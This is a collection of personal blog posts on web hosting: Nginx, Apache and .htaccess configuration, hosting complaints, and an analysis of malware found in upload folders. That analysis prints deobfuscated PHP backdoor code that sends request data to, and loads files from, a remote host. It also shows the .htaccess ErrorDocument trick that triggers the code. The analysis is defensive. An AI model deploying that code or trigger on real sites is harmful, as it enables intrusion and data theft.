Restricting xmlrpc.php

Earlier today, I saw some spikes on the load graph for the new server (where this site is hosted).

Upon checking the logs I saw a lot of these (the source IP and identity fields are omitted here):

- - [01/May/2020:12:21:54 +0000] "POST //xmlrpc.php HTTP/1.1" 200 264 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
- - [01/May/2020:12:21:55 +0000] "POST //xmlrpc.php HTTP/1.1" 200 264 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
- - [01/May/2020:13:44:24 +0000] "POST //xmlrpc.php HTTP/1.1" 200 265 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
- - [01/May/2020:13:44:25 +0000] "POST //xmlrpc.php HTTP/1.1" 200 265 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"

I’m not naming the owner of the source IPs; technical readers can look them up if they are interested. The second IP, however, comes from a rather interesting IP range.

Searching the Internet, I found that many people consider xmlrpc.php a problem. For those not familiar with WordPress, this file handles external communications: for example, when you use the mobile application to manage your site, and also when you use Jetpack.

There are plugins to disable XML-RPC such as this one, but I use the app from time to time, so I would like to keep xmlrpc.php working.

The official Jetpack website provides this list for whitelisting purposes.

I have been restricting access to my /wp-admin URL for ages, using Nginx. I think it is a good idea to do the same for xmlrpc.php.

location ~ ^/xmlrpc\.php$ {
    include conf.d/includes/jetpack-ipvs-v4.conf;
    deny all;

    include fastcgi.conf;
    fastcgi_intercept_errors on;
    fastcgi_pass php;
}
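The included file simply contains allow directives generated from the Jetpack list, one per address range. For illustration only (the actual entries come from the downloaded list):

```nginx
# conf.d/includes/jetpack-ipvs-v4.conf (generated file; the entry below is illustrative)
allow 192.0.64.0/18;
```

Because Nginx evaluates allow and deny rules in order, any request from outside the listed ranges falls through to the deny all.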

A simple script updates this IP list in the Nginx configuration consumed by the block above:

#!/bin/sh
# Paths match the include in the Nginx configuration above
FILENAME=jetpack-ipvs-v4.conf
CONF_FILE=/etc/nginx/conf.d/includes/${FILENAME}

# Fetch the official Jetpack IPv4 list
wget -q -O /tmp/ips-v4.txt https://jetpack.com/ips-v4.txt
if [ -s /tmp/ips-v4.txt ]; then
  awk '{print "allow "$1";"}' /tmp/ips-v4.txt > /tmp/${FILENAME}
  [ -s ${CONF_FILE} ] || touch ${CONF_FILE}
  if [ "$(diff /tmp/${FILENAME} ${CONF_FILE})" != "" ]; then
    echo "Files differ, replacing ${CONF_FILE} and reloading nginx"
    mv -fv /tmp/${FILENAME} ${CONF_FILE}
    systemctl reload nginx
  else
    echo "File /tmp/${FILENAME} matches ${CONF_FILE}, not doing anything"
    rm -f /tmp/${FILENAME}
  fi
fi
rm -f /tmp/ips-v4.txt

It can be executed periodically by cron so that when the IP list changes, the configuration gets updated.
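For example, assuming the script is saved as /usr/local/bin/update-jetpack-ips.sh (the path and schedule here are hypothetical), a system cron entry could refresh the list daily:

```
# /etc/cron.d/jetpack-ips: refresh the Jetpack allow list every day at 04:00
0 4 * * * root /usr/local/bin/update-jetpack-ips.sh
```

Since the script only reloads Nginx when the generated file actually changes, running it daily is harmless.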

Now, if any IP address other than Jetpack’s tries to access /xmlrpc.php, it will receive Error 403 Forbidden.

Have fun!

Leverage Browser Caching

In the previous post I wrote about enabling compression for your pages so that they load faster for visitors. Today I’m going to write about how you can use browser caching to save some bandwidth.

Some people have told me that their ISP or hosting provider asked them to upgrade their hosting plan or subscribe for more bandwidth. Since this site doesn’t have that much traffic, I wouldn’t know.

However, recently I was able to help with a website that has a lot of visitors compared to this site: around 14-18 visitors per minute on a working day, with very high bandwidth usage of more than a gigabyte per day.

On that website, I saw many requests for images (photos). The images aren’t that big, around 100KB each, but the number of requests made them significant.

Armed with knowledge of mod_expires, I added the following clauses to .htaccess, hoping that the server had the module installed. The configuration below is minimal; Google PageSpeed actually suggests 1 week.

<ifmodule mod_expires.c>
        ExpiresActive On
        ExpiresByType image/gif "access plus 2 hours"
        ExpiresByType image/png "access plus 2 hours"
        ExpiresByType image/jpg "access plus 2 hours"
        ExpiresByType image/jpeg "access plus 2 hours"
        ExpiresByType text/css "access plus 2 hours"
        ExpiresByType application/javascript "access plus 2 hours"
        ExpiresByType application/x-javascript "access plus 2 hours"
</ifmodule>

Although I know why Google Analytics sets its expiry to 2 hours, it’s kind of amusing since the suggestion comes from another Google product. Oh well, I am allowed to be amused, right?

So let’s get to the results. Here are the bandwidth graphs from both days. I enabled mod_expires at around 6PM on 5 January 2012.

We can’t really see the difference by looking at the graphs alone. Google Analytics shows at least 200 more visits on 6 January 2012. The numbers? Here you go:

At least 400MB were saved by this technique. You can also apply specific settings to each folder on your website. For example, 2 hours is fine for cosmetic images that may need to change frequently, but not for photos. If you run a photography website, you can even set your photos to expire in 1 year!
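As a sketch of such per-folder settings, a separate .htaccess dropped inside a photo folder (the folder name here is just an example) can override the site-wide 2 hours:

```apache
# .htaccess inside /photos/ - published photos rarely change, so cache for a year
<ifmodule mod_expires.c>
        ExpiresActive On
        ExpiresByType image/jpeg "access plus 1 year"
</ifmodule>
```

Apache merges .htaccess files per directory, so the longer expiry applies only to files under that folder.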

What mod_expires actually does is tell the browser that the resource (an image, for example) expires on a specific date, and it is flexible enough to compute that date relative to the access time. Here is the link to the official manual page for mod_expires.

Please note that this is not a quick fix for the lazy. You must think hard about the proper expiry time; otherwise normal users will not see your changes or updates to an image until the copy cached in their browsers expires!

Good luck!

Let Apache Compress Your Website

Website speed is one of the most important factors in making people want to visit more. In 2008, I wrote Compressing WordPress Output, which was done by adding one line to index.php.

The problem with that approach is that every WordPress upgrade requires you to manually re-add the line to index.php, and the technique does not improve loading time for administration pages.

With this technique, compression is done on the fly by Apache, and it improves loading time because your browser receives smaller files. Some old browsers were broken (they did not know how to handle compressed content), but today’s browsers handle it just fine.

If your webhost allows you to add your own .htaccess, then you can use this technique. Note that this works for any type of website, not just WordPress.

<ifmodule mod_deflate.c>
     AddOutputFilterByType DEFLATE text/text text/html text/plain text/xml text/css application/x-javascript application/javascript
</ifmodule>

As simple as that. The directive above asks Apache to compress text, HTML, XML, CSS, and JavaScript files before sending them to the browser. We don’t compress images because they are already compressed; we would save very little while putting extra stress on Apache.
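To get a feel for the savings, here is a quick sketch (file paths under /tmp are arbitrary) that gzips a repetitive HTML page the same way mod_deflate would before sending it:

```shell
# Generate a 2000-paragraph HTML page, compress a copy, and compare sizes
seq 1 2000 | sed 's/.*/<p>Hello visitor number &<\/p>/' > /tmp/page.html
gzip -kf /tmp/page.html               # -k keeps the original alongside page.html.gz
orig=$(wc -c < /tmp/page.html)
gz=$(wc -c < /tmp/page.html.gz)
echo "original: ${orig} bytes, gzipped: ${gz} bytes"
```

HTML is full of repeated tags, which is exactly what DEFLATE compresses well, so the gzipped copy comes out a small fraction of the original size.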

You can use Firebug or Chrome’s developer tools to verify that your content is now compressed. You might have to clear your browser cache first; otherwise the files will not be requested from the server again. Look for the Content-Encoding response header, which should say “gzip”. To satisfy yourself, capture the size of the page (there should be a column for that) before and after you add the directives to .htaccess, and you should see a significant reduction in size.

If you don’t see gzip, then either your webhost does not allow .htaccess or mod_deflate is not installed on the server. To check whether mod_deflate is installed, remove the 1st and 3rd lines (the <ifmodule> wrapper) in .htaccess and refresh the page; if the module is not installed, you will see an error.

For Joomla! users, there’s an easier way to do it in the Global Configuration section:

Simple eh?

For WordPress, one might argue that you can change the gzipcompression parameter in the semi-hidden configuration page, but I tried it in WordPress 3.2.1 and it did not work. I read in the WordPress forums that the feature was removed because Apache handles it much better.

Go ahead and try it out. Your visitors will be thankful.

RegisterFly Resurrected as RegFly

I received an email yesterday:


It’s from RegFly, a resurrection of RegisterFly, the lousiest domain registrar ever. I had a very bad experience with them: a slow, buggy system and unresponsive customer support. They are no longer an ICANN-accredited registrar, so I guess they are reselling; even their main domain is registered under Tucows.

ICANN announcements:

Stay away. Look for an ICANN accredited registrar.

Image Hotlink Protection

Have people been stealing images from your websites? Well, there are not many interesting images on this site, so I don’t really have that problem. You can add a watermark to your images, but I guess everyone knows that.

Another form of image theft also involves bandwidth theft. It has many names: hotlinking, inline linking, leeching, and others. Since many of us use shared hosting with limited bandwidth, the quota will run out sooner when bandwidth is being stolen by other sites.

I have a 1.5TB monthly bandwidth limit, but I still don’t agree with people stealing my bandwidth by hotlinking images, especially since I host quite a number of sites in this account. On Apache hosting it’s easy to prevent hotlinking with an .htaccess file:

RewriteEngine On
RewriteCond %{HTTP_REFERER} !^http://(.+\.)?yourdomain\.com/ [NC]
RewriteCond %{HTTP_REFERER} !^$
RewriteRule .*\.(jpe?g|gif|bmp|png)$ /nohotlink.pne [L]

WordPress users can add the above lines before the WordPress rewrite rule:

# BEGIN WordPress

What the configuration does is check whether HTTP_REFERER matches the specified domain or is empty (a direct request, for example). If it is neither empty nor matching, Apache sends the contents of the file /nohotlink.pne to the browser instead. Why does this work? Because when an image is loaded through an <img> tag, the referrer is the page calling the image. You can also point the rule at a nonexistent image so that a broken-image icon is displayed on the hotlinker’s site, or better still, replace the last line with:

RewriteRule .*\.(jpe?g|gif|bmp|png)$ - [F]

My implementation will cause the image to be replaced with:

Hotlink protection

By the way, the hotlink protection image is named with the .pne extension to prevent an infinite rewrite loop: since the rule matches the usual image extensions, serving a .png replacement would trigger the rule again. You can also use other image formats, and any other extension. Some fussy browsers might not display it correctly, but who cares? The point is to prevent people from hotlinking, isn’t it?

Try it out yourself. Good luck!

Upload Folder Invasions and Security

I was doing a routine backup job for a client’s website hosted on Exabytes the other day and noticed something funny. There were supposed to be only image, PDF, and video files in the upload folders, but there were also .htaccess and PHP files in the main upload folder and in each of the subfolders.

The first thing that crossed my mind was that my code was not secure enough; Flash upload security is difficult to handle, so I had used only some basic techniques to prevent illegal uploads. However, I decided to look around Internet Webhosting’s server (I also have an account there) and saw the same thing happening in a fellow blogger’s WordPress upload folder, which coincidentally is on the same server as my other account. I have so many “other” accounts I sometimes lose track.

Testing further, I found that I am able to manipulate files in another user’s upload folder if its permission is set to 777 (drwxrwxrwx). I was able to create new files, move existing files, and even worse, delete them. Technically this is because the webserver process (apache for Apache 1.x, httpd for Apache 2.x) usually runs as nobody or another common user account on the server. So it does not matter who runs a PHP file from the browser; the server thinks the user always has the proper permission.

So on a typical shared host, other users are actually able to copy your source code if you are running a custom application (in contrast to WordPress, which is publicly available anyway).

This problem does not affect other parts of the website or the database.

I am NOT going to post the code that I used to check and test these claims, so it’s really up to you whether or not to trust me.

However, the following code was in the foreign PHP files (they are named using numbers: XXXXX.php), and it was all on one line, most probably to make it harder to understand. I cleaned it up to improve readability; the excerpt below is abridged, so the line numbers mentioned afterwards refer to the full file.

<?php
$a = (isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST);
$d = (isset($_SERVER["PHP_SELF"]) ? $_SERVER["PHP_SELF"] : $PHP_SELF);
$z = "/?" . base64_encode($a) . "." . base64_encode($b) . "." . base64_encode($c) . "." . base64_encode($d) . "." . base64_encode($e) . "." . base64_encode($f) . "." . base64_encode($g) . "." . base64_encode($h) . ".e." . base64_encode($i) . "." . base64_encode($j);
$f = base64_decode("cGhwc2VhcmNoLmNu");
if (basename($c) == basename($i) && isset($_REQUEST["q"]) && md5($_REQUEST["q"]) == "51e1225f5f7bca58cb02a7cf6a96dddd") {
	$f = $_REQUEST["id"];
} else if ($c = file_get_contents(base64_decode("aHR0cDovLzcu") . $f . $z)) {
	$cu = curl_init(base64_decode("aHR0cDovLzcxLg==") . $f . $z);
	$o = curl_exec($cu);
}

Lines 3-12 collect data about the request.
Line 14 dumps all of the collected information into the variable $z.
$f is the variable that holds the domain of the culprit:

print base64_decode('cGhwc2VhcmNoLmNu');

Lines 16-17 handle certain queries (I think when the request comes from the culprits themselves).
Line 18 tries to include the remote file:

print base64_decode('aHR0cDovL2FkczEu');

Line 19 tries to load the remote file:

print base64_decode('aHR0cDovLzcu');

And the final attempt, in lines 23-27, tries to use the cURL extension to load:

print base64_decode('aHR0cDovLzcxLg==');
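For the record, the four obfuscated strings can be decoded in one go with the shell’s base64 tool:

```shell
# Decode each base64 string found in the dropped PHP file
for s in cGhwc2VhcmNoLmNu aHR0cDovL2FkczEu aHR0cDovLzcu aHR0cDovLzcxLg==; do
  printf '%s -> ' "$s"
  printf '%s' "$s" | base64 -d
  echo
done
# prints:
#   cGhwc2VhcmNoLmNu -> phpsearch.cn
#   aHR0cDovL2FkczEu -> http://ads1.
#   aHR0cDovLzcu -> http://7.
#   aHR0cDovLzcxLg== -> http://71.
```

The host name is deliberately split into fragments so that the culprit’s full URLs never appear in the file as plain text.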

How is this possible? Well, they also uploaded .htaccess files that look like this:

Options -MultiViews
ErrorDocument 404 //path/to/upload/folder/subfolder/XXXXXX.php

And yes, it only activates when a 404 (file not found) is encountered in the folder. But still, I don’t like the intrusion. Would you?

I can’t really think of a workaround to the permission problem, as users will always have to set upload folder permissions to 777. Even changing the group ownership to the group used by the httpd process will not prevent access by other users.

However, GoDaddy seems to have a good technique for overcoming this problem, as I can’t access other users’ folders there. I have wanted to find out how they implemented this for a while; I noticed it the first time I used their hosting, since I didn’t have to change permissions on my upload folders.

WP-Cache and GoDaddy Hosting

I have several blogs hosted on GoDaddy servers.

If your WordPress blog is hosted on GoDaddy hosting, do not use the WP-Cache plugin, or your site will intermittently produce Error 500 (Internal Server Error). I can’t spot the cause even with the error logs enabled; there seems to be nothing in them!

I’ve heard similar complaints from other GoDaddy hosting users. One thing I am sure about is that the problem is not the combination of WP-Cache and WordPress 2.1.3, as I have blogs hosted elsewhere that work fine with this combination.

I guess I will have to dig deeper… when I can find the time! Anyway, the server speed and stability have been good so far even without WP-Cache, which is what we want to achieve by caching pages in the first place. Hopefully the blogs do not overload the server anytime soon.

Hosting: Responsibility of Customer or Provider?

This post is specially dedicated to Exabytes’ latest customer newsletter, which provides very useful information on how customers can prevent servers from overloading and causing service downtime.

I do agree with what Exabytes has to say, and it is true that when services went down, it was indeed caused by processes using too much CPU and memory. However, it must also be noted that not all users are efficient programmers; sometimes code is simply written to achieve a goal without considering the impact on server resources. This is the user’s fault.

I guess you know there is a big BUT coming: when I experience service downtime, I can see many cron (task scheduler) jobs running out of control on the server. Some of them are even a few weeks old. These are obviously user cron jobs, and here there is a lack of policing by Exabytes. When a service goes down, the engineers simply restart it without investigating what caused the overload.

After receiving an email confirming that the service is back up, I usually go in and check, and the zombie processes are still there, hogging MySQL and CPU resources.

We need to keep in mind that not all users are technical or have shell access like I do, and they might not even know that their application or cron job is causing resource problems. So IMHO it’s the provider’s responsibility to alert users when that happens.

Now I only serve images from that server: a server in the US checks whether the visitor is from Asia and whether the Exabytes server is up. If it’s up, the images are served from there; if not, users have to wait a little longer for images to load.


Bad Domain

I just tried to register with Chitika and Nuffnang, and they both rejected my email address with this domain.

I thought all systems had updated their validation code to accept .name as well, since the TLD has been around for quite a while now.

Invalid email

Well, I sent them an email to notify them about this glitch. I think they’ll want to fix it, as this reduces frustration when bloggers with .name domains try to register.

Update: It turns out my email to Nuffnang went through after all; the bounce I received was due to forwarding to multiple recipients (like what I usually do for important email addresses). In this case, Timothy’s mail address was unreachable.

This message was created automatically by mail delivery software.

A message that you sent could not be delivered to one or more of its
recipients. This is a permanent error. The following address(es) failed:

timothy at
(ultimately generated from admin at
retry time not reached for any host after a long failure period

—— This is a copy of the message, including all the headers. ——

Return-path: <ady at>
Received: from [] (
by with smtp (Exim 4.63)
(envelope-from <ady at>)
id 1Hawvh-0007WZ-9g
for admin at; Tue, 10 Apr 2007 00:41:22 +0800

Oh well, no big deal. I’ve registered using another email anyway 😉

Update: I received a reply from Nuffnang. Well done, people. Good speed.

Another Reason Not To Host In Malaysia

Would you register your blog if the Government asked you to? Although I rarely write about sensitive issues related to the Government, I have to express myself on this one.

So now the Malaysian Government is planning to make it compulsory for bloggers to register themselves. Here is an article from The Star: Bloggers may have to register.

According to another news item in The Star Online, there is a “… plan to register all bloggers using locally hosted websites …”. If this is true, it no longer concerns me, since I moved away from Malaysian hosting. So was my decision to move from Exabytes the correct one?

We have to wait for the official announcement from the Government.

My opinion is that this is entirely unnecessary. From what I see, the Government is creating another enemy instead of embracing bloggers for a better country. Why can’t the Government take it as a challenge to make things better, or even take it as the voice of the people living in this country? There is always a reason why people speak badly of a government, and not only in Malaysia. A Malay proverb says exactly that: Kalau tak ada angin takkan pokok bergoyang (if there were no wind, the tree would not sway).

And really, this is the classic case of kerana nila setitik rosak susu sebelanga (because of one bad thing or person, the entire group gets a bad reputation).

So after this, there should not be any question why Malaysians do not host their websites within the country. Not that the service is good anyway.

As usual I include the original news below in case the original article is no longer available.


Bye, Exabytes

It has become worse over these last few days. Mail is going missing, and the site has been inaccessible many times. I’ve set up server monitoring, and I receive on average 6 downtime alerts per day, with checks triggered every 30 minutes.

I’ve seen people writing about my plugin say “if you can’t access the site, try again later”. And my AdSense stats show very few impressions, meaning that many people are having problems accessing this site and the 4 others I have set up on this server.

Accessing this site is slow, very slow. I have to do something about it now.

As I have SSH access to the server, I can see many cron jobs that have been running for days without finishing. One thing about Exabytes’ servers is that they have a lot of features and allow people to do things that many overseas hosting companies do not. That’s a good thing, except that when a user does something stupid, there’s nobody looking into the problem.

Well, the Engineers are fast when you report something, and they do a good job at reactive work. But I don’t see any proactive work being done. I once reported that the MySQL server was taking a lot of load and freezing, and asked them to check which user was causing it (even if it was myself) so that it could be prevented in the future. All they could say was that the MySQL server was now running fine.

Even though this is not downtime, it is certainly close to it. The server load sometimes goes as high as 34 (this is not a percentage; it is the 1-minute load average on a UNIX machine, roughly the number of processes fighting over CPU resources).
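For readers unfamiliar with load averages, they are easy to inspect on any UNIX-like machine:

```shell
# The three numbers after "load average:" are the 1-, 5-, and 15-minute averages
uptime
# On Linux the same data lives in /proc/loadavg; the first field is the 1-minute average
cat /proc/loadavg
```

A load of 34 on a typical shared server with one or two CPUs means dozens of processes are queued up waiting for CPU time.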


And I don’t think they are going to do anything about it. I am not sure how many domains are hosted on this particular server, but I am guessing there are a lot. I checked PHP’s max_execution_time using the CLI and it is set to 30 seconds. So why don’t the scripts running from cron die?


Exabytes Replies

Following the case I wrote about, Exabytes’ disappointing response to my notification, I received an email from the Director of Business Development saying how sorry they are about the incident.

Responding to a customer without being asked is indeed very beneficial to a business. Customers feel happy that someone inside the company actually cares (even if they don’t really). It’s good business practice, and kudos to Exabytes.

I suddenly remembered a video I once watched by Ron Kauffman, in which he explained how good customer service can overcome product defects. I agree with him 100%, if not more.

RegisterFly Gets Ditched By eNom

One little, meaningful email from my mailbox:

This is a formal notice to owners of domains which have been registered through eNom via its reseller,


Although you purchased your name at RegisterFly, eNom is the actual registrar of record for your domains. As we are severing our relationship with RegisterFly, we are aware that this may have an impact on you as the domain owner.
Therefore we would like to offer this opportunity to assist you in securing control of your domain name directly with eNom.

Over the last year, eNom has become aware of an increasing number of complaints from dissatisfied RegisterFly customers.

As an eNom reseller, RegisterFly is contractually bound to adhere to certain standards of customer service in a speedy and diligent manner. Therefore, effective immediately, we have terminated RegisterFly as a reseller of domain names through eNom.

eNom has come to its senses: when people bought domains from RegisterFly, eNom’s name was displayed as well. At least it used to be like that; now RegisterFly is a fully accredited registrar on its own. The question is, isn’t there any control or qualification required by ICANN before it allows a company to become an accredited registrar?

Update: It turns out that when the domains were transferred to eNom, we got an extended renewal for free! A domain I had that expired on 17 Jan 2007 was renewed even though I was ready to let it go. Maybe this is a sign, and I should do something with that domain?

Update: It turns out that the domains are indeed expired; they keep them for themselves. The expiry date shown in a whois query is one year later, but the system says it’s expired. 🙂

Frustration With Exabytes

Between 00:20 and 02:10 Malaysian time (16:20 to 18:10 GMT), the Apache service on the server hosting this site was down. I know that only Apache was down because I couldn’t access the websites using a web browser, but I could still access FTP, SSH, SMTP, and POP. Here’s what I put in the form for Exabytes technical support:


We can’t access the site using HTTP. Apache may be down. I can access FTP, SMTP, SSH, and POP. I realize there was a problem with the network at the data center as described in your announcement, but that problem would cause outages on all services, not only HTTP.

Just letting you know as you may not realize Apache is down.

Thank you.

And the reply I received surprised me:

Dear Ady,
At the moment, our network had high latency.
Our network engineers are currently working on this issue.
You may refer to:

If you have any enquiries, please do not hesitate to contact. Thank You.
Best Regards,
KM Chow
System Engineer,
Exa Bytes Network Sdn Bhd

With an excellent customer support record so far (at least in my experience), I was surprised that this Engineer (?) couldn’t read properly. He shouldn’t have repeated the URL I had already mentioned; it somehow implies the customer can’t read, and the reply really looks like a template.

I am hosting at Exabytes Malaysia because their customer support is fast and my access to the server is very fast. But right now I am thinking of moving my blog elsewhere. Too bad some of the other sites I host here must stay, since they target Malaysian customers and local access is fast for them.